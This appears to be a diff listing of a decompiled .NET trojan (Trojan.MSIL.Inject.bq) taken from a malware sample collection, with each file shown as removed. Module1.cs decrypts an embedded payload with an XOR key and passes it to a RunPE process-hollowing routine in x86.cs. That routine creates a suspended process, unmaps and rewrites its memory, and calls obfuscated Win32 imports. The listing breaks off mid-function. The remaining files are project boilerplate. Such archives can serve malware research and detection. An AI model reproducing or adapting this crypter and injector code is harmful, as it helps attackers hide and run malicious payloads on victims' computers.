Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
return destinationArray;
}
label_5:
return (byte[]) null;
}
private static void \uE002(Stream _param0, Stream _param1)
{
byte[] buffer = new byte[4096];
while (true)
{
int count = _param0.Read(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
_param1.Write(buffer, 0, count);
else
break;
}
}
private static RSAParameters \uE003(byte[] _param0)
{
bool flag = _param0.Length == 160;
if ((!flag ? 1 : 0) == 0 && !\uE010.\uE004(_param0, \uE010.\uE003, 20))
return new RSAParameters();
if (!flag && !\uE010.\uE004(_param0, \uE010.\uE004, 8))
return new RSAParameters();
RSAParameters rsaParameters = new RSAParameters();
int num1 = (flag ? 20 : 8) + 8;
int num2 = 4;
rsaParameters.Exponent = \uE010.\uE001(_param0, num1, num2);
Array.Reverse((Array) rsaParameters.Exponent);
int num3 = num1 + num2;
int num4 = 128;
rsaParameters.Modulus = \uE010.\uE001(_param0, num3, num4);
Array.Reverse((Array) rsaParameters.Modulus);
if (flag)
return rsaParameters;
int num5 = num3 + num4;
label_8:
int num6 = 14;
while (true)
{
switch (num6)
{
case 0:
rsaParameters.P = \uE010.\uE001(_param0, num5, num4);
num6 = 12;
continue;
case 1:
rsaParameters.DQ = \uE010.\uE001(_param0, num5, num4);
num6 = 6;
continue;
case 2:
num5 += num4;
num6 = 15;
continue;
case 3:
rsaParameters.D = \uE010.\uE001(_param0, num5, num4);
num6 = 10;
continue;
case 4:
num5 += num4;
num6 = 7;
continue;
case 5:
rsaParameters.InverseQ = \uE010.\uE001(_param0, num5, num4);
num6 = 9;
continue;
case 6:
Array.Reverse((Array) rsaParameters.DQ);
num6 = 2;
continue;
case 7:
num4 = 64;
num6 = 1;
continue;
case 8:
num4 = 64;
num6 = 17;
continue;
case 9:
Array.Reverse((Array) rsaParameters.InverseQ);
num6 = 13;
continue;
case 10:
Array.Reverse((Array) rsaParameters.D);
num6 = 23;
continue;
case 11:
Array.Reverse((Array) rsaParameters.DP);
num6 = 4;
continue;
case 12:
Array.Reverse((Array) rsaParameters.P);
num6 = 16;
continue;
case 13:
num5 += num4;
num6 = 19;
continue;
case 14:
num4 = 64;
num6 = 0;
continue;
case 15:
num4 = 64;
num6 = 5;
continue;
case 16:
num5 += num4;
num6 = 21;
continue;
case 17:
rsaParameters.DP = \uE010.\uE001(_param0, num5, num4);
num6 = 11;
continue;
case 18:
rsaParameters.Q = \uE010.\uE001(_param0, num5, num4);
num6 = 20;
continue;
case 19:
num4 = 128;
num6 = 3;
continue;
case 20:
Array.Reverse((Array) rsaParameters.Q);
num6 = 22;
continue;
case 21:
num4 = 64;
num6 = 18;
continue;
case 22:
num5 += num4;
num6 = 8;
continue;
case 23:
goto label_32;
default:
goto label_8;
}
}
label_32:
return rsaParameters;
}
private static bool \uE004(byte[] _param0, byte[] _param1, int _param2)
{
int index = 0;
if ((index == 0 ? 1 : 0) != 0)
goto label_7;
else
goto label_2;
label_1:
int num;
switch (num)
{
case 0:
goto label_3;
case 1:
return false;
}
label_2:
num = 0;
goto label_1;
label_3:
if ((int) _param0[index + _param2] != (int) _param1[index])
{
num = 1;
goto label_1;
}
else
++index;
label_7:
if (index >= _param1.Length)
return true;
goto label_3;
}
private static bool \uE005(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
{
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
int num = 0;
byte[] hash;
string name;
while (true)
{
switch (num)
{
case 0:
hash = cryptoServiceProvider.ComputeHash(_param1);
num = 3;
continue;
case 1:
name += (string) (object) 'A';
num = 4;
continue;
case 2:
name += (string) (object) 'H';
num = 1;
continue;
case 3:
name = new string('S', 1);
num = 2;
continue;
case 4:
name += (string) (object) '1';
num = 5;
continue;
case 5:
goto label_8;
default:
goto label_2;
}
}
label_8:
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID(name), _param2);
}
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyDescription("1")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("Cursor")]
[assembly: AssemblyCompany("")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]

54
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/Module1.cs
View File

@ -1,54 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[STAThread]
public static void Main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, numArray, 0, length);
int int32 = BitConverter.ToInt32(numArray, checked (numArray.Length - 4));
byte[] bytes = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[checked (numArray.Length - 3 + 1)]);
Random random = new Random(int32);
byte[] buffer = new byte[checked (bytes.Length - 1 + 1)];
random.NextBytes(buffer);
int num = checked (bytes.Length - 1);
int index = 0;
while (index <= num)
{
bytes[index] = (byte) ((int) bytes[index] ^ (int) buffer[index]);
checked { ++index; }
}
x86.RunPE(bytes, Process.GetCurrentProcess().MainModule.FileName);
}
}
}

23
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/MyApplication.cs
View File

@ -1,23 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyApplication
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}

24
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/MyComputer.cs
View File

@ -1,24 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyComputer
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[GeneratedCode("MyTemplate", "10.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}

194
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/MyProject.cs
View File

@ -1,194 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyProject
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Cursor.My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}

36
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/MySettings.cs
View File

@ -1,36 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettings
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}

31
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/MySettingsProperty.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettingsProperty
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[StandardModule]
[CompilerGenerated]
[HideModuleName]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/My/Resources/Resources.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.Resources.Resources
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Cursor.My.Resources
{
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
[StandardModule]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Cursor.My.Resources.Resources.resourceMan, (object) null))
Cursor.My.Resources.Resources.resourceMan = new ResourceManager("Cursor.Resources", typeof (Cursor.My.Resources.Resources).Assembly);
return Cursor.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Cursor.My.Resources.Resources.resourceCulture;
set => Cursor.My.Resources.Resources.resourceCulture = value;
}
}
}

120
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

55
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/Trojan.MSIL.Inject.bq.csproj
View File

@ -1,55 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DB0F9657-D1CA-4DA3-A976-572DE02B9852}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Cursor</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<TargetFrameworkProfile />
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<FileAlignment>512</FileAlignment>
<RootNamespace>Cursor</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="x86.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/Trojan.MSIL.Inject.bq.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cursor", "Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.csproj", "{DB0F9657-D1CA-4DA3-A976-572DE02B9852}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DB0F9657-D1CA-4DA3-A976-572DE02B9852}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DB0F9657-D1CA-4DA3-A976-572DE02B9852}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DB0F9657-D1CA-4DA3-A976-572DE02B9852}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DB0F9657-D1CA-4DA3-A976-572DE02B9852}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

170
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b/x86.cs
View File

@ -1,170 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.x86
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EF23CDDD-6C00-4B88-ACE0-9F7817FD7B65
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-00b0f120dd3cf2bf4160b29162077c85344d4e9c23a717f725db80ce58d2144b.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace Cursor
{
public class x86
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public x86()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!x86.Win32.Inventiondumem((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (x86.Win32.f564gs(pInfo[1], ctxt) && x86.Win32.fzezf(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && x86.Win32.f564gsf(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = x86.Win32.tobe(hProc1, addr1, size2, 12288, 64);
bool flag = x86.Win32.hhh(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
